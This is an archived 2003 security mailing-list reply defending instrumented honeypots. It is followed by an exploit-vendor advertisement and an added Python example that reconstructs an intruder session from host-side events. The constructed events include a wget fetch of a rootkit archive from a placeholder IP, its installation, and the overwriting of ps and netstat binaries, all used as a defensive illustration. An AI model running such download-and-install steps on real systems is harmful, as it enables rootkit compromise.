On June 23, 2003 06:58 am, Rob Shein wrote:

> This wouldn't work. Seeing the packets/traffic on the wire doesn't tell
> you the tools that are used, and it also doesn't really give you much else.
> Considering that a honeypot is either not really rootable (DTK) or is very
> low hanging fruit (and very rootable, like a honeynet.org system), they
> either won't see tools downloaded to the system or won't see anything more
> than the bare minimum needed to exploit a system that is too vulnerable to
> begin with.

Putting on my Honeynet Project hat...

I think you presume too much about honeypots. There are _many_ varieties of
honeypots. Some more rootable than others, some more detectable than others.
And it's also possible to instrument them with many other monitoring systems
besides just sniffing traffic in and out. I'll leave the specifics as an
exercise for the reader.... :-) but they range from running inside vmware to
instrumented OS loads and even special hardware in some cases.

Lately the Honeynet Alliance folks have been deploying other systems besides
your typical low hanging fruit.

Different honeypots gather different data. It all depends on what you are
trying to catch.

Beware the Jabberwock...

cheers,
--dr

-- 
pgpkey http://dragos.com/ kyxpgp

---------------------------------------------------------------------------
Latest attack techniques.

You're a pen tester, but is google.com still your R&D team? Now you can get
trustworthy commercial-grade exploits and the latest techniques from a
world-class research group.

Visit us at: www.coresecurity.com/promos/sf_ept1 or call 617-399-6980
----------------------------------------------------------------------------
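The disagreement above is about what a honeypot can observe: a sniffer on the wire versus instrumentation inside the honeypot OS. The following is an added example, written for this archive page and not part of the original message or of any Honeynet Project tool. It reconstructs an intruder's tool download and binary replacement from constructed host-side events (an assumed syscall-style record format), and contrasts that with the flow-level view a passive sniffer gets of the same session when the interactive channel is SSH. All addresses, filenames, timestamps and the record formats are constructed for illustration.

```python
"""Host-side honeypot instrumentation vs. passive sniffing.

Added example. The record formats below are assumptions made for this
illustration and do not match any particular honeypot's output.
"""
import re
from dataclasses import dataclass

# Writes into these directories by an intruder are the classic sign of a
# rootkit replacing system binaries.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/")

# Constructed host-side events from an instrumented honeypot OS:
#   <epoch> pid=<pid> <event> key=value ... [argv=<command line>]
HOST_EVENTS = """\
1056235901 pid=2231 exec path=/bin/sh argv=sh
1056235904 pid=2231 exec path=/usr/bin/wget argv=wget http://198.51.100.7/rk.tgz
1056235904 pid=2231 connect dst=198.51.100.7:80
1056235905 pid=2231 write path=/tmp/rk.tgz bytes=40960
1056235907 pid=2231 exec path=/bin/tar argv=tar xzf /tmp/rk.tgz
1056235909 pid=2231 exec path=/tmp/rk/install argv=./install
1056235910 pid=2240 write path=/usr/bin/ps bytes=61000
1056235911 pid=2240 write path=/usr/bin/netstat bytes=58200
"""

# Constructed flow summary for the same session as a sniffer sees it: the
# intruder came in over SSH, so only endpoints, ports and volume survive.
WIRE_FLOWS = """\
1056235898 203.0.113.9:41022 -> 192.0.2.5:22 proto=tcp bytes=18234
1056235904 192.0.2.5:35011 -> 198.51.100.7:80 proto=tcp bytes=41100
"""

LINE_RE = re.compile(r"^(\d+) pid=(\d+) (\w+)(.*)$")
FLOW_RE = re.compile(r"^(\d+) (\S+):(\d+) -> (\S+):(\d+) proto=(\w+) bytes=(\d+)$")


@dataclass
class HostEvent:
    ts: int
    pid: int
    kind: str
    attrs: dict


def parse_host_events(text):
    """Parse the assumed host-event format; argv is kept whole since it
    may contain spaces and is always the last field."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, pid, kind, rest = m.groups()
        rest, _, argv = rest.partition(" argv=")
        attrs = dict(tok.split("=", 1) for tok in rest.split())
        if argv:
            attrs["argv"] = argv
        events.append(HostEvent(int(ts), int(pid), kind, attrs))
    return events


def reconstruct_session(events):
    """What host-side instrumentation alone reveals: every command run,
    every URL fetched, and every system binary overwritten."""
    commands = [e.attrs.get("argv", "") for e in events if e.kind == "exec"]
    downloads = []
    for cmd in commands:
        words = cmd.split()
        if words and words[0] in ("wget", "curl", "ftp", "tftp"):
            downloads.extend(w for w in words[1:] if "://" in w)
    trojaned = sorted({e.attrs["path"] for e in events
                       if e.kind == "write" and e.attrs["path"].startswith(SYSTEM_DIRS)})
    return {"commands": commands, "downloads": downloads, "trojaned_binaries": trojaned}


def parse_wire_flows(text):
    flows = []
    for line in text.splitlines():
        m = FLOW_RE.match(line)
        if m:
            ts, src, sport, dst, dport, proto, nbytes = m.groups()
            flows.append({"ts": int(ts), "src": src, "sport": int(sport),
                          "dst": dst, "dport": int(dport), "proto": proto,
                          "bytes": int(nbytes)})
    return flows


def wire_view(flows):
    """What the sniffer alone can say: destination, port and byte count.
    Nothing about commands, tool names or files touched."""
    return [(f["dst"], f["dport"], f["bytes"]) for f in flows]


def correlate_downloads(events, flows):
    """Tie each host-side connect() to its wire flow, so the download seen
    on the host can be checked against the volume seen on the wire."""
    matches = []
    for e in events:
        if e.kind != "connect":
            continue
        host, port = e.attrs["dst"].rsplit(":", 1)
        for f in flows:
            if f["dst"] == host and f["dport"] == int(port):
                matches.append((e.attrs["dst"], f["bytes"]))
    return matches


if __name__ == "__main__":
    ev = parse_host_events(HOST_EVENTS)
    fl = parse_wire_flows(WIRE_FLOWS)
    print("host view:", reconstruct_session(ev))
    print("wire view:", wire_view(fl))
    print("correlated:", correlate_downloads(ev, fl))
```

Run stand-alone, the wire view amounts to "an SSH session to port 22 and one outbound fetch from port 80", while the host view names the fetched archive, the commands typed, and the replaced ps and netstat binaries. That gap is the case for instrumenting the honeypot OS itself rather than relying on the sniffer.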
This archive was generated by hypermail 2b30 : Tue Jun 24 2003 - 08:28:30 PDT